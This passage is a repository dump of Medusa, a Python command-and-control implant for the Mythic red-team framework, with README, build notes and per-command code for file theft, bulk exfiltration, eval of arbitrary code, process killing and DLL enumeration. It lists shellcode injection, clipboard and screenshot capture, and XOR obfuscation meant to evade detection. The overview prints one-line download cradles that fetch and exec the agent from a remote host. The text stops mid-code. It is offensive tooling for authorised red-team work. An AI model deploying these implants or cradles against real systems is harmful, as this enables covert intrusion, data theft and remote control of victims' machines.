    "content": "{\r\n    \"username\": \"mythic_user\",\r\n    \"password\": \"mythic_password\",\r\n    \"virtual_host\": \"mythic_vhost\",\r\n    \"host\": \"127.0.0.1\",\r\n    \"name\": \"hostname\",\r\n    \"rabbitmq_password\": \"rabbitmq_password\",\r\n    \"rabbitmq_host\": \"127.0.0.1\",\r\n    \"mythic_server_host\": \"127.0.0.1\",\r\n    \"container_files_path\": \"/Mythic/\"\r\n}\r\n"
  },
  {
    "path": "README.md",
    "content": "<p align=\"center\">\n  <img alt=\"Medusa Logo\" src=\"agent_icons/medusa.svg\" height=\"30%\" width=\"30%\">\n</p>\n\n# Medusa\n\nMedusa is a cross-platform agent compatible with both Python 3.8 and Python 2.7.\n\n## Installation\nTo install Medusa, you'll need Mythic v3 installed on a remote computer. You can find installation instructions for Mythic at the [Mythic project page](https://github.com/its-a-feature/Mythic/).\n\nFrom the Mythic install root, run the command:\n\n`./mythic-cli install github https://github.com/MythicAgents/Medusa.git`\n\nOnce installed, restart Mythic to build a new agent.\n\n## RabbitMQ Config Notes\n\nThe file [Payload_Type/medusa/rabbitmq_config.json](Payload_Type/medusa/rabbitmq_config.json) is a template and must match your Mythic environment.\n\n- Set `rabbitmq_password` to your Mythic `RABBITMQ_PASSWORD` value (typically from Mythic `.env`).\n- Set `rabbitmq_host` to your RabbitMQ host/container name (often `mythic_rabbitmq` in docker-compose setups, or `127.0.0.1` for local binds).\n- Set `mythic_server_host` to your Mythic server host/container name (often `mythic_server` in docker-compose setups, or `127.0.0.1` for local binds).\n\n## Notable Features\n- Dynamic loading/unloading of agent functions to limit exposure of agent capabilities on-disk.\n- Loading of Python modules in-memory for use in custom scripts.\n- Cross-platform SOCKS5 proxy\n- macOS clipboard reader, screenshot grabber and TCC database parsing\n- File browser compatibility with upload/download\n- Eval() of dynamic Python code\n- Basic Authentication Proxy compatibility\n\n## Commands Manual Quick Reference\n\nThe base agent and included commands all use built-in Python libraries, so do not need additional packages to function. Agents will run the commands in threads, so long-running uploads or downloads won't block the main agent.\n\n### General Commands\n\nCommand | Syntax | Description\n------- | ------ | -----------\ncat | `cat path/to/file` | Read and output file content.\ncd | `cd [.. dir]` | Change working directory (`..` to go up one directory).\ncp | `cp src_file_or_dir dst_file_or_dir` | Copy file or folder to destination.\ncwd | `cwd` | Print working directory.\ndownload | `download [path]` | Download a file from the target system.\ndownload_bulk | `download_bulk [path1] [path2] ...` | Download multiple files from the target system in one task.\nexit | `exit` | Exit a callback.\nenv | `env` | Print environment variables.\neval_code | `eval_code [commands]` | Execute python code and return output.\njobkill | `jobkill [task id]` | Send stop signal to long running task.\njobs | `jobs` | List long-running tasks, such as downloads.\nlist_modules | `list_modules [module_name]` | Lists in-memory modules or the full file listing for a specific module.\nload | `load command` | Load a new capability into an agent.\nload_module | `load_module` | Load a zipped Python module into memory (adapted from [here](https://github.com/sulinx/remote_importer) and [here](https://github.com/EmpireProject/EmPyre/blob/master/data/agent/agent.py#L464)).\nload_script | `load_script` | Load and execute a Python script through the agent.\nls | `ls [. path]` | List files and folders in `[path]` or use `.` for current working directory.\nmv | `mv src_file_or_dir dst_file_or_dir` | Move file or folder to destination.\npip_freeze | `pip_freeze` | Programmatically list installed packages on system.\nrm | `rm file_or_dir` | Delete file or folder.\nshell | `shell [command]` | Run a shell command which will spawn using subprocess.Popen(). Note that this will wait for command to complete so be careful not to block your agent.\nsocks | `socks start/stop [port]` | Start/stop SOCKS5 proxy through Medusa agent.\nsleep | `sleep [seconds] [jitter percentage]` | Set the callback interval of the agent in seconds.\nunload | `unload command` | Unload an existing capability from an agent.\nunload_module | `unload_module module_name` | Unload a Python module previously loaded into memory.\nupload | `upload` | Upload a file to a remote path on the machine.\nwatch_dir | `watch_dir path seconds` | Watch for changes in target directory, polling for changes at a specified rate.\n\n\n### macOS Commands\n\nCommand | Syntax | Description\n------- | ------ | -----------\nclipboard | `clipboard` | Output contents of clipboard (uses Objective-C API, as outlined by Cedric Owens [here](https://github.com/cedowens/MacC2/blob/main/client.py#L90). macOS only, Python 2.7 only).\nlist_apps | `list_apps` | List macOS applications (Python 2.7 only, macOS only).\nlist_tcc | `list_tcc [path]` | List entries in macOS TCC database (requires full-disk access and Big Sur only atm).\nscreenshot | `screenshot` | Take a screenshot (uses Objective-C API, macOS only, Python 2.7 only).\nspawn_jxa | `spawn_jxa` | Spawn an `osascript` process and pipe Javascript content to it.\nvscode_list_recent | `vscode_list_recent [state_db]` | Lists files and folders recently opened with VSCode.\nvscode_open_edits | `vscode_open_edits [backup_dir_path]` | Lists unsaved changes made to files in VSCode.\nvscode_watch_edits | `vscode_watch_edits [path to remote dir] [poll_interval]` | Poll the VSCode backups directory at a given interval for unsaved edits.\n\n### Windows Commands\n\nCommand | Syntax | Description\n------- | ------ | -----------\nshinject | `shinject` | Inject shellcode into target PID using CreateRemoteThread (Windows only - adapted from [here](https://gist.github.com/RobinDavid/9214020)).\nload_dll | `load_dll dll_path dll_export` | Load an on-disk DLL and execute an exported function (NOTE: This DLL must return an int value on completion, an msfvenom-created DLL, for example, will kill your agent upon completion).\nlist_dlls | `list_dlls [pid]` | Read process memory (PEB) of local or target process to fetch list of loaded DLLs (Python 3 only)\nps | `ps` | Get limited process information, e.g. PID, process names, architecture and binary paths (Python 3 only)\nps_full | `ps_full` | Get full process information, including PPID, integrity level and command line (Python 3 only)\nkill | `kill` | Terminate a process by process ID (Python 3 only)\n\n\n## Python Versions\n\nBoth versions of the Medusa agent use an AES256 HMAC implementation written with built-in libraries (adapted from [here](https://github.com/boppreh/aes)), removing the need for any additional dependencies beyond a standard Python install. As such the agent should operate across Windows, Linux and macOS hosts. It's worth mentioning that this crypto implementation does introduce some overhead when handling large files (screenshotting, downloads, etc.) but it's workable.\n\n### Py2 vs Py3 Commands\n\nWithin the `Payload_Type/Medusa/agent_code` directory, you will see `base_agent` files with both `py2` and `py3` suffixes. Likewise, similar file extensions can be seen for individual function files too.\n\nThese are read by the `builder.py` script to firstly select the right base Python version of the Medusa agent. `builder.py` will then include commands that are specific to the chosen python version. In the case where a command only has a `.py` extension, this will be used by default, with the assumption being that no alternative code is needed between the Py2 and Py3 versions.\n\n## Threaded Jobs\n\nMedusa uses basic threading for job execution. Where jobs are potentially long-running, they can be implemented with a 'stop check' to respond to a signal from the `jobkill` task. This can be implemented with a code snippet similar to that shown below:\n```\nif [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n  # Some job-specific tidy up\n  return \"Job stopped.\"\n```\nThis handler can be seen implemented within the `download`, `upload`, `watch_dir` and `screenshot` commands.\n\nAdditionally, if the long-running job is expected to provide continuous output, the `sendTaskOutputUpdate` function - included in the base agent - can be used to update Mythic prior to the task completion. A dummy function that provides continuous output and can be `jobkill`'d can be seen below.\n\n```\ndef dummyFunction(self, task_id):\n  while(True):\n      # Check if we've got a stop signal.\n      if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]: return \"Job stopped.\"\n\n      # Send output back to Mythic\n      self.sendTaskOutputUpdate(task_id, \"We're still running\")\n\n      time.sleep(10)\n```\n\n## Supported C2 Profiles\n\nMedusa currently supports two C2 profiles: `http` (both with and without AES256 HMAC encryption) and `azure_blob`.\n\n### HTTP Profile\n\nThe HTTP profile calls back to the Mythic server over the basic, non-dynamic profile. GET requests for taskings, POST requests with responses.\n\n## Thanks\n\n- Browser scripts and agent code adapted from [@its_a_feature_](https://twitter.com/its_a_feature_) and [@djhohnstein](https://twitter.com/djhohnstein).\n- [MacC2](https://github.com/cedowens/MacC2/) and [this](https://medium.com/red-teaming-with-a-blue-team-mentality/making-objective-c-calls-from-python-standard-libraries-550ed3a30a30) blog post from Cedric Owens\n- [EmPyre](https://github.com/EmpireProject/EmPyre/) and [this](https://www.xorrior.com/In-Memory-Python-Imports/) blog post from Chris Ross.\n- The crypto wizardry found [here](https://github.com/boppreh/aes).\n- Agent icon from [flaticon.com](https://www.flaticon.com)\n"
  },
  {
    "path": "config.json",
    "content": "{\n\t\"exclude_payload_type\": false,\n\t\"exclude_c2_profiles\": false,\n\t\"exclude_documentation_payload\": false,\n\t\"exclude_documentation_c2\": true,\n\t\"exclude_agent_icons\": false\n}\n"
  },
  {
    "path": "documentation-c2/.keep",
    "content": ""
  },
  {
    "path": "documentation-payload/.keep",
    "content": ""
  },
  {
    "path": "documentation-payload/medusa/_index.md",
    "content": "+++\ntitle = \"Medusa\"\nchapter = false\nweight = 5\n+++\n\n![logo](/agents/medusa/medusa.svg?width=200px)\n## Summary\n\nMedusa is a cross-platform Python agent compatible with Python 2.7 and 3.8.\n\n### Highlighted Agent Features\n\nPython is an incredibly popular programming language and is often installed by default on many operating systems. Python 2.7, for example, is currently available on the latest macOS installs (though expected to be discontinued).\nDefault libraries, such as `Cocoa` and `ctypes`, allow access to Objective-C APIs and functionality through Windows DLLs.\n\nThe Medusa agent itself has several key features including:\n- Support for dynamic loading/unloading of functionality to limit exposure of agent capabilities on-disk. \n- A SOCKS5 proxy compatible across Python 2.7 and 3.8, and across macOS, Windows and Linux.\n- Encrypted comms.\n- `Eval()` of Python code to dynamically extend functionality.\n\nWith the ability to execute arbitrary script on the command-line, a rudementary download cradle can be used, such as the below (notably, not proxy-aware):\n```\npython3 -c \"import urllib.request; exec(urllib.request.urlopen('https://[REMOTE_HOST]/medusa.py').read())\" &\n```\n\nOr for Python 2.7:\n```\npython -c \"import urllib2;exec(urllib2.urlopen('https://[REMOTE_HOST]/medusa.py').read())\" &\n```\n\n### Build Options\n\nThis section provides details of what each Medusa-specific build option provides\n\n#### Python Version\n\nPretty self-explanatory, select which version of Python the Medusa agent should be created for. See the Development section for details of how this works under the hood.\n\n#### Output Format\n\nMythic can provide the final agent code as a Python script, or as a Base64-encoded blob. Note that this is the last stage of the process effectively. So any XOR obfuscation, crypto library selection or Python version selection will take place before this.\n\n#### Cryptography library\n\nMedusa agents can be built using either a manual crypto implementation or using the non-default `cryptography` library. Given, the manual implementation isn't going to be as quick or efficient as the main Python library (not to mention the extra code required), `cryptography` use might be the way to go. Though do bear in mind, it is not a default library and appears to only be installed on macOS by default.\n\n{{% notice info %}}\n Either option here won't affect the agents ability to use encrypted comms, it is purely to specify how the encrypted comms are achieved.\n{{% /notice %}}\n\n#### XOR and Base64-encode\n\nFinally, the plaintext Medusa script can be encrypted via XOR with a randomly-generated key, before being Base64 encoded. This blob is then wrapped with an unpacker and put in a `exec()` function to ultimately run the Medusa agent. This is designed to make the agent less signaturable when on-disk. See the OPSEC section for more details.\n\n#### Verify HTTPS Certificate\n\nBy default, the web request libraries used in Medusa will fail when handling a self-signed certificate for HTTPS. This function introduces code to skip cert verification, so C2 can be established.\n\n\n### Important Notes\nEach job is executed in a new thread. Long-running jobs can be viewed with the `jobs` command and, where a 'stop' functionality has been implemented, they can be killed with `jobkill`.\n\n## Authors\n@ajpc500\n\n\n"
  },
  {
    "path": "documentation-payload/medusa/c2_profiles/Azure_Blob.md",
    "content": "+++\ntitle = \"Azure Blob\"\nchapter = false\nweight = 103\n+++\n\n## Summary\nThe `medusa` agent supports Azure Blob Storage as a transport profile.\n\nTasking and responses are exchanged through blobs in the provisioned container:\n\n- Agent uploads request blobs to `ats/<message_id>.blob`\n- Agent polls and downloads response blobs from `sta/<message_id>.blob`\n- Agent deletes processed response blobs after retrieval\n\nAt build time, Medusa calls the `azure_blob` service to provision scoped configuration and stamps the generated values into the payload.\n\n### Profile Option Deviations\n\n#### Callback Interval / Jitter\nThe Azure Blob transport uses callback interval and jitter to control polling cadence for `sta/` response blobs.\n\n#### HTTPS Verification\nIf Medusa build parameter `https_check` is set to `No`, TLS certificate verification is disabled for blob operations.\n\n### Build-Time Notes\n\nWhen `azure_blob` is selected, Medusa:\n\n1. Requests configuration from the `azure_blob` service (`generate_config` RPC)\n2. Embeds:\n   - blob endpoint\n   - container name\n   - scoped SAS token\n3. Uses the core+transport template assembly process to generate the final payload\n"
  },
  {
    "path": "documentation-payload/medusa/c2_profiles/HTTP.md",
    "content": "+++\ntitle = \"HTTP\"\nchapter = false\nweight = 102\n+++\n\n## Summary\nThe `medusa` agent uses a series of `POST` web requests to send responses for tasking and a series of `GET` requests to get tasking from the Mythic server. \n\n### Profile Option Deviations\n\n#### Callback Host\nThe URL for the redirector or Mythic server. This must include the protocol to use (e.g. `http://` or `https://`).\n"
  },
  {
    "path": "documentation-payload/medusa/c2_profiles/_index.md",
    "content": "+++\ntitle = \"C2 Profiles\"\nchapter = true\nweight = 25\npre = \"<b>4. </b>\"\n+++\n\n# Supported C2 Profiles\n\nThis section goes into any `medusa` specifics for the supported C2 profiles.\n\nCurrent supported profiles:\n\n- HTTP\n- Azure Blob\n"
  },
  {
    "path": "documentation-payload/medusa/commands/_index.md",
    "content": "+++\ntitle = \"Commands\"\nchapter = true\nweight = 15\npre = \"<b>2. </b>\"\n+++\n\n# medusa command reference\n\nThese pages provide in-depth documentation and code samples for the `medusa` commands."
  },
  {
    "path": "documentation-payload/medusa/commands/cat.md",
    "content": "+++\ntitle = \"cat\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nOutputs the string content of a given file. No need for quotes and relative paths are fine.\n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500\n\n### Arguments\n\n#### path_to_read\n\n- Description: path to file we're going to read from\n- Required Value: True  \n- Default Value: None  \n\n## Usage\n\n```\ncat /path/to/file\n```\n\n## MITRE ATT&CK Mapping\n\n- T1005  \n\n## Detailed Summary\n\nPrints the contents of a file on the target system:\n\n```Python\n    def cat(self, task_id, path):\n        file_path = path if path[0] == os.sep \\\n                else os.path.join(self.current_directory,path)\n        \n        with open(file_path, 'r') as f:\n            content = f.readlines()\n            return ''.join(content)\n\n```\n\n"
  },
  {
    "path": "documentation-payload/medusa/commands/cd.md",
    "content": "+++\ntitle = \"cd\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nChange the current working directory to another directory. No quotes are necessary and relative paths are fine \n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500\n\n### Arguments\n\n#### path\n\n- Description: path to change directory to  \n- Required Value: True  \n- Default Value: None  \n\n## Usage\n\n### Without Popup Option\n```\ncd ../path/here\n```\n\n## MITRE ATT&CK Mapping\n\n- T1083\n\n## Detailed Summary\nYou can either type `cd` and get a popup to fill in the path, or provide the path on the command line. \n\n```Python\n    def cd(self, task_id, path):\n        if path == \"..\":\n            self.current_directory = os.path.dirname(os.path.dirname(self.current_directory + os.sep))\n        else:\n            self.current_directory = path if path[0] == os.sep \\\n                else os.path.abspath(os.path.join(self.current_directory,path))\n\n```\n"
  },
  {
    "path": "documentation-payload/medusa/commands/clipboard.md",
    "content": "+++\ntitle = \"clipboard\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nGet all the types of contents on the clipboard, return specific types, or set the contents of the clipboard. \n\n{{% notice warning %}}\n Root does _*NOT*_ have a clipboard\n{{% /notice %}}\n \n- Needs Admin: False  \n- Version: 1\n- Author: @ajpc500\n\n### Reading Clipboard\n\n```\nclipboard\n```\nThis will read the plaintext data on the clipboard only. Any non-text content will be omitted.\n\n## MITRE ATT&CK Mapping\n\n- T1115  \n\n## Detailed Summary\n\nThis uses Objective C API calls to read all the types available on the general clipboard for the current user. The clipboard on macOS has a lot more data than _just_ what you copy. All of that data is collected and returned in a JSON blob of key:base64(data). To do this, we use this JavaScript code:\n```JavaScript\nlet pb = $.NSPasteboard.generalPasteboard;\nlet types = pb.types.js;\nlet clipboard = {};\nfor(let i = 0; i < types.length; i++){\n    let typejs = types[i].js;\n    clipboard[typejs] = pb.dataForType(types[i]);\n    if(clipboard[typejs].js !== undefined){\n        clipboard[typejs] = clipboard[typejs].base64EncodedStringWithOptions(0).js;\n    }else{\n        clipboard[typejs] = \"\";\n    }\n}\n```\nThere's a browserscript for this function that'll return all of the keys and the plaintext data if it's there.\n"
  },
  {
    "path": "documentation-payload/medusa/commands/cp.md",
    "content": "+++\ntitle = \"cp\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nCopy a given file or folder to a specified location. No quotes are necessary and relative paths are fine \n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500\n\n### Arguments\n\n#### source_path\n\n- Description: path of file/folder to copy\n- Required Value: True  \n- Default Value: None  \n\n#### dest_path\n\n- Description: path to copy file/folder to  \n- Required Value: True  \n- Default Value: None  \n\n## Usage\n\n### Without Popup Option\n```\ncp path/of/file_or_folder /dest/to/copy/to \n```\n\n## Detailed Summary\nYou can either type `cp` and get a popup to fill in the paths, or provide the paths on the command line. \n\n```Python\n    def cp(self, task_id, source, destination):\n        import shutil\n\n        source_path = source if source[0] == os.sep \\\n                else os.path.join(self.current_directory,source)\n\n        dest_path = destination if destination[0] == os.sep \\\n                else os.path.join(self.current_directory,destination)\n\n        if os.path.isdir(source_path):\n            shutil.copytree(source_path, dest_path)\n        else:\n            shutil.copy(source_path, dest_path)\n```\n"
  },
  {
    "path": "documentation-payload/medusa/commands/cwd.md",
    "content": "+++\ntitle = \"cwd\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nPrints the current working directory for the agent \n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500\n\n## Usage\n\n```\ncwd\n```\n\n## MITRE ATT&CK Mapping\n\n- T1083  \n\n## Detailed Summary\n\nPrints the variable value used by Medusa to track current directory:\n\n```Python\n    def cwd(self, task_id):\n        return self.current_directory\n```\n\n"
  },
  {
    "path": "documentation-payload/medusa/commands/download.md",
    "content": "+++\ntitle = \"download\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nDownload a file from the target machine. \n     \n- Python Versions Supported: 2.7, 3.8     \n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n### Arguments\n\n#### remote_path\n\n- Description: /remote/path/on/victim.txt  \n- Required Value: True  \n- Default Value: None  \n\n## Usage\n\n```\ndownload /remote/path\n```\n\n## MITRE ATT&CK Mapping\n\n- T1020\n- T1030\n- T1041\n\n## Detailed Summary\nThis function uses API calls to chunk and transfer a file from the agent:\n\n```Python\n    def download(self, task_id, file):\n        file_path = file if file[0] == os.sep \\\n                else os.path.join(self.current_directory,file)\n\n        file_size = os.stat(file_path).st_size \n        total_chunks = int(file_size / CHUNK_SIZE) + (file_size % CHUNK_SIZE > 0)\n\n        data = {\n            \"action\": \"post_response\", \n            \"responses\": [\n            {\n                \"task_id\": task_id,\n                \"total_chunks\": total_chunks,\n                \"full_path\": file_path,\n                \"chunk_size\": CHUNK_SIZE\n            }]\n        }\n        initial_response = self.postMessageAndRetrieveResponse(data)\n        chunk_num = 1\n        with open(file_path, 'rb') as f:\n            while True:\n                if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n                    return \"Job stopped.\"\n\n                content = f.read(CHUNK_SIZE)\n                if not content:\n                    break # done\n\n                data = {\n                    \"action\": \"post_response\", \n                    \"responses\": [\n                        {\n                            \"chunk_num\": chunk_num,\n                            \"file_id\": initial_response[\"responses\"][0][\"file_id\"],\n                            \"chunk_data\": base64.b64encode(content).decode(),\n                            \"task_id\": task_id\n                        }\n                    ]\n                }\n                chunk_num+=1\n                response = self.postMessageAndRetrieveResponse(data)\n\n```"
  },
  {
    "path": "documentation-payload/medusa/commands/download_bulk.md",
    "content": "+++\ntitle = \"download_bulk\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nBulk download file(s), director(ies), or a mix from the target machine.\n\nTwo modes are supported:\n\n- **archive** *(default)*: all files are bundled into a single in-memory zip archive that is streamed back to the Mythic server. The archive is never written to disk on the target.\n- **iterative**: each file is transferred individually using the same chunked approach as the `download` command.\n\nThe command automatically detects whether each supplied path is a file or a directory. When a directory is specified, all files within it (recursively) are included. Files that do not exist or are not accessible are skipped rather than causing the entire task to fail.\n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False\n- Version: 1\n- Author: @maclarel\n\n### Arguments\n\n#### path\n\n- Description: An array of file or directory paths to download. Multiple entries can be added through the Mythic UI or provided as a JSON array.\n- Required Value: True\n- Default Value: None\n\n#### mode\n\n- Description: `archive` (default) to bundle everything into a single in-memory zip, or `iterative` to transfer each file individually.\n- Required Value: False\n- Default Value: `archive`\n\n## Usage\n\nDownload an entire directory as a zip archive (default mode):\n\n```\ndownload_bulk {\"path\": [\"/remote/directory\"], \"mode\": \"archive\"}\n```\n\nDownload a single file using archive mode:\n\n```\ndownload_bulk {\"path\": [\"/remote/path/to/file.txt\"]}\n```\n\nDownload multiple specific files iteratively:\n\n```\ndownload_bulk {\"path\": [\"/remote/file1.txt\", \"/remote/file2.txt\"], \"mode\": \"iterative\"}\n```\n\nDownload a directory, sending each file individually:\n\n```\ndownload_bulk {\"path\": [\"/remote/directory\"], \"mode\": \"iterative\"}\n```\n\n## MITRE ATT&CK Mapping\n\n- T1020\n- T1030\n- T1041\n\n## Detailed Summary\n\nThe `download_bulk` function extends the single-file `download` capability to support bulk transfers.\n\n### Path detection\n\nThe `path` argument accepts an array of paths. Each entry is resolved using `os.path.isdir` and `os.path.isfile`. Relative paths are resolved against the agent's current working directory:\n\n- **Directory** – the directory tree is walked with `os.walk`; every file found is added to the transfer list.\n- **File** – added directly to the transfer list.\n- **Non-existent** – skipped with a warning message; the task continues with remaining files.\n\n### Archive mode\n\nAn in-memory `zipfile.ZipFile` (backed by `io.BytesIO`) is created and populated with all target files. The zip data is then chunked and sent to the Mythic server using the same `download` API used by the single-file `download` command.\n\nNote: This can be extremely slow to transfer larger amounts of data due to chunking. Expect to take a walk or a nap if you're trying to pull thousands of files/hundreds of MB of data.\n\nDirectory structure is preserved inside the zip using `os.path.relpath` to compute each entry's arcname:\n\n- **Directory input** (e.g. `/etc/nginx`): entries are anchored at the parent directory, so the top-level name is included — `nginx/nginx.conf`, `nginx/conf.d/default.conf`.\n- **Single file input**: only the filename is stored (`passwd`).\n- **Explicit list input**: entries are anchored at the filesystem root, preserving the full path — `etc/passwd`, `home/user/report.txt`.\n\n### Iterative mode\n\nEach file is transferred individually in the same chunked manner as the existing `download` command. A separate `file_id` is obtained from Mythic for each file, and the agent streams each one to completion before moving on to the next.\n\n```Python\n    def download_bulk(self, task_id, path, mode=\"archive\"):\n        import zipfile, io\n\n        # Build file list from path array (files, directories, or mix)\n        ...\n\n        if mode == \"iterative\":\n            for file_path in file_list:\n                # chunk and send each file (same as download())\n                ...\n        else:\n            # Build in-memory zip\n            zip_buffer = io.BytesIO()\n            with zipfile.ZipFile(zip_buffer, 'w', zipfile.ZIP_DEFLATED) as zf:\n                for file_path in file_list:\n                    zf.write(file_path, arcname)\n            # chunk and send zip_buffer.getvalue()\n            ...\n```\n"
  },
  {
    "path": "documentation-payload/medusa/commands/env.md",
    "content": "+++\ntitle = \"env\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nPrints the environment variables for the current process\n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500\n\n## Usage\n\n```\nenv\n```\n\n## Detailed Summary\n\nLists the contents of the `os.environ` list:\n\n```Python\n    def env(self, task_id):\n        return \"\\n\".join([\"{}: {}\".format(x, os.environ[x]) for x in os.environ])\n \n```\n\n"
  },
  {
    "path": "documentation-payload/medusa/commands/eval_code.md",
    "content": "+++\ntitle = \"eval_code\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nSend and interpret new Python code.\n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500\n\n### Arguments\n\n#### code\n\n- Description: code to execute\n- Required Value: True  \n- Default Value: None  \n\n## Usage\n\n```\neval_code {code to execute}\n```\n\n## Detailed Summary\n\nUses the `eval()` function to interpret a string containing arbitrary Python code:\n\n```Python\n    def eval_code(self, task_id, command):\n        return eval(command)\n\n```\n\n"
  },
  {
    "path": "documentation-payload/medusa/commands/exit.md",
    "content": "+++\ntitle = \"exit\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nThis exits the current Medusa agent. \n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n## Usage\n\n```\nexit\n```\n\n\n## Detailed Summary\n\nThe command executes this call:\n```Python\n    def exit(self, task_id):\n        os._exit(0)\n```\n\n"
  },
  {
    "path": "documentation-payload/medusa/commands/jobs.md",
    "content": "+++\ntitle = \"jobs\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nLists the currently running jobs (aka long-running functions) for our agent.\n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500\n\n## Usage\n\n```\njobs\n```\n\n## Detailed Summary\n\nLists the long-running functions running for our agent, this omits the main thread, the jobs function itself and any threads associated with the SOCKS proxy (outside of the main SOCKS thread, which we do include):\n\n```Python\n    def jobs(self, task_id):\n        out = [t.name.split(\":\") for t in threading.enumerate() \\\n            if t.name != \"MainThread\" and \"a2m\" not in t.name \\\n            and \"m2a\" not in t.name and t.name != \"jobs:{}\".format(task_id) ]\n        if len(out) > 0: return { \"jobs\": out }\n        else: return \"No long running jobs!\"\n\n```\n\n"
  },
  {
    "path": "documentation-payload/medusa/commands/kill.md",
    "content": "+++\ntitle = \"kill\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nThis uses the ctypes library to interface with Windows API to terminate a process with a specified PID.\n\n- Python Versions Supported: 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n## Usage\n\n```\nkill process_id\n```\n\n\n## Detailed Summary\nThis function takes a given PID and attempts to open a process handle and terminate it.\n\n```Python\n    def kill(self, task_id, process_id):\n        import ctypes, ctypes.wintypes\n        from ctypes import GetLastError\n\n        NTSTATUS = ctypes.wintypes.LONG\n\n        def _check_bool(result, func, args):\n            if not result:\n                raise ctypes.WinError(ctypes.get_last_error())\n            return args\n        \n        Kernel32 = ctypes.WinDLL('kernel32.dll')\n        OpenProcess = Kernel32.OpenProcess\n        OpenProcess.restype = ctypes.wintypes.HANDLE\n        CloseHandle = Kernel32.CloseHandle\n        CloseHandle.errcheck = _check_bool\n        TerminateProcess = Kernel32.TerminateProcess\n        TerminateProcess.restype = ctypes.wintypes.BOOL\n\n        PROCESS_TERMINATE = 0x0001\n        PROCESS_QUERY_INFORMATION = 0x0400\n        \n        try:\n            hProcess = OpenProcess(PROCESS_TERMINATE | PROCESS_QUERY_INFORMATION, False, process_id)\n            if hProcess:\n                TerminateProcess(hProcess, 1)\n                CloseHandle(hProcess)    \n        except Exception as e:\n            return e\n\n```"
  },
  {
    "path": "documentation-payload/medusa/commands/list_apps.md",
    "content": "+++\ntitle = \"list_apps\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nThis uses NSApplication.RunningApplications API to get information about running applications.\n\n- Python Versions Supported: 2.7\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n## Usage\n\n```\nlist_apps\n```\n\n## MITRE ATT&CK Mapping\n\n- T1057  \n\n## Detailed Summary\nThis is different than executing `ps` in a terminal since this only reports back running applications, not _all_ processes running on a system.\n\n```Python\n    def list_apps(self, task_id):\n        from Cocoa import NSWorkspace\n        app_json = []\n        apps = NSWorkspace.sharedWorkspace().runningApplications()\n        for app in apps:\n            try:\n                app_data = { \"pid\": str(app.processIdentifier()), \"name\": str(app.localizedName()), \"exec_url\": str(app.executableURL()) }\n                app_json.append(app_data)\n            except: pass\n        return { \"apps\": app_json }\n\n```\n\nThis output is turned into a sortable table via a browserscript.\n\n"
  },
  {
    "path": "documentation-payload/medusa/commands/list_dlls.md",
    "content": "+++\ntitle = \"list_dlls\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nThis uses the ctypes library to interface with Windows API to read the local or a remote process's PEB and list the loaded DLLs.\n\n- Python Versions Supported: 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n## Usage\n\n```\nlist_dlls [process_id]\n```\n\n## MITRE ATT&CK Mapping\n\n- T1057  \n\n## Detailed Summary\nThis function takes an optional PID. If none is given, it will list DLLs loaded in the current process.\n\n```Python\n    def list_dlls(self, task_id, process_id=0):\n        import sys, os.path, ctypes, ctypes.wintypes\n        from ctypes import create_unicode_buffer, GetLastError\n        import re\n        import datetime\n\n        def _check_bool(result, func, args):\n            if not result:\n                raise ctypes.WinError(ctypes.get_last_error())\n            return args\n\n        PULONG = ctypes.POINTER(ctypes.wintypes.ULONG)\n        ULONG_PTR = ctypes.wintypes.LPVOID\n        SIZE_T = ctypes.c_size_t\n        NTSTATUS = ctypes.wintypes.LONG\n        PVOID = ctypes.wintypes.LPVOID\n        PROCESSINFOCLASS = ctypes.wintypes.ULONG\n\n        Kernel32 = ctypes.WinDLL('kernel32.dll')\n        OpenProcess = Kernel32.OpenProcess\n        OpenProcess.restype = ctypes.wintypes.HANDLE\n        CloseHandle = Kernel32.CloseHandle\n        CloseHandle.errcheck = _check_bool\n\n        GetCurrentProcess = Kernel32.GetCurrentProcess\n        GetCurrentProcess.restype = ctypes.wintypes.HANDLE\n        GetCurrentProcess.argtypes = ()\n\n        ReadProcessMemory = Kernel32.ReadProcessMemory\n        ReadProcessMemory.errcheck = _check_bool\n        ReadProcessMemory.argtypes = (\n            ctypes.wintypes.HANDLE,\n            ctypes.wintypes.LPCVOID,\n            ctypes.wintypes.LPVOID, \n            SIZE_T,\n            ctypes.POINTER(SIZE_T)) \n\n        # 